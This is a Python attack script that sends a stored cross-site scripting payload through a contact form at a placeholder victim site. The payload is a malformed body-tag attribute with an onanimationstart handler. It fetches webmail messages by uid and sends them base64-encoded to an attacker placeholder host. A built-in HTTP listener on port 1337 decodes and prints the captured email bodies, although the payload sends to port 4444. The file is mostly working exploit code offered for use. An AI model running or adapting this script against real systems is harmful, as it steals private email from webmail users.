import threading
import time
import requests
import base64
from bs4 import BeautifulSoup
from http.server import BaseHTTPRequestHandler, HTTPServer

# --- HTTP Listener ---
class RequestHandler(BaseHTTPRequestHandler):
    """Handler class passed to the HTTPServer created in ``listener``.

    Only ``Capture_Emails`` is defined here; it reads ``self.path`` and
    prints to stdout.
    """

    def Capture_Emails(self):
        """Decode a base64 ``c`` query value from the request path and print
        the inner HTML of its ``div#messagebody`` element, if present.

        Reads ``self.path`` only; returns None. A path without ``?c=`` is
        ignored silently.
        """
        if '?c=' in self.path:
            # No query parsing: everything after the first '?c=' is taken as
            # the base64 blob.
            b64_data = self.path.split('?c=')[1]
            # NOTE(review): b64decode raises binascii.Error on bad padding and
            # nothing here catches it; 'ignore' only covers undecodable UTF-8.
            decoded = base64.b64decode(b64_data).decode('utf-8', 'ignore')
            soup = BeautifulSoup(decoded, 'html.parser')
            messagebody_div = soup.find('div', id='messagebody')
            if messagebody_div:
                # Unvalidated remote input is written to the terminal as-is,
                # including any control sequences it may contain.
                print("\n[+] Captured Email Content:")
                print(messagebody_div.decode_contents())
            else:
                print("\n[-] No messagebody div found")

def listener(port=1337):
    """Run a blocking HTTP server on *port* using ``RequestHandler``.

    Args:
        port: TCP port to bind; the empty host string binds every interface.

    Does not return under normal operation: ``serve_forever`` loops until
    the process exits.
    """
    bind_addr = ('', port)
    server = HTTPServer(bind_addr, RequestHandler)
    print(f"[*] Listening on port {port}...\n")
    server.serve_forever()

# --- Start Listener ---
# Run the HTTP server in a daemon thread so the main thread stays free;
# the short pause gives it a moment to bind before anything is sent.
listener_thread = threading.Thread(
    target=listener,
    daemon=True,
)
listener_thread.start()
time.sleep(1)

# --- Attack Configuration ---
# Endpoint the form POSTs go to, and the inclusive uid range iterated below.
TARGET_URL = "http://victim.com/contact"
START_UID, END_UID = 1, 4

# --- Critical Fixes ---
# One POST per uid in [START_UID, END_UID]. The HTML payload goes in the
# form's "message" field with "content" set to "html"; the result of each
# request is only printed, never inspected.
for uid in range(START_UID, END_UID + 1):
    # 1. Revert to original attribute injection (no quotes around style/event)
    malicious_payload = (
        f'<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes '  # Intentional missing quote
        f'onanimationstart=fetch(\'/?_task=mail&_action=show&_uid={uid}&_mbox=INBOX&_extwin=1\')'  # Use & instead of &amp;
        '.then(r=>r.text()).then(t=>fetch(`http://YOUR_IP:4444/?c=${btoa(t)}`)) foo=bar>'  # Ensure backticks
    )

    # Form fields for the contact endpoint. "recipient" is left as a
    # placeholder by the author.
    post_data = {
        "name": "XSS Bot",
        "email": "[email protected]",
        "message": malicious_payload,
        "content": "html",
        "recipient": "THE_ONE_U_WILL_SEND_EMAIL_TO"
    }

    try:
        print(f"[*] Sending payload for UID {uid}...")
        # NOTE(review): the broad `except Exception` below also masks
        # non-network errors; requests.RequestException would be the
        # narrower catch for this call.
        response = requests.post(TARGET_URL, data=post_data, timeout=10)
        print(f"[+] UID {uid} sent (Status: {response.status_code})")
    except Exception as e:
        print(f"[!] Error for UID {uid}: {str(e)}")

    time.sleep(2)  # Increase delay to avoid rate limiting

# --- Keep Alive ---
# Block the main thread so the daemon listener thread is not torn down;
# Ctrl-C is the only exit path.
try:
    while True:
        time.sleep(1)
except KeyboardInterrupt:
    print("\n[!] Stopping...")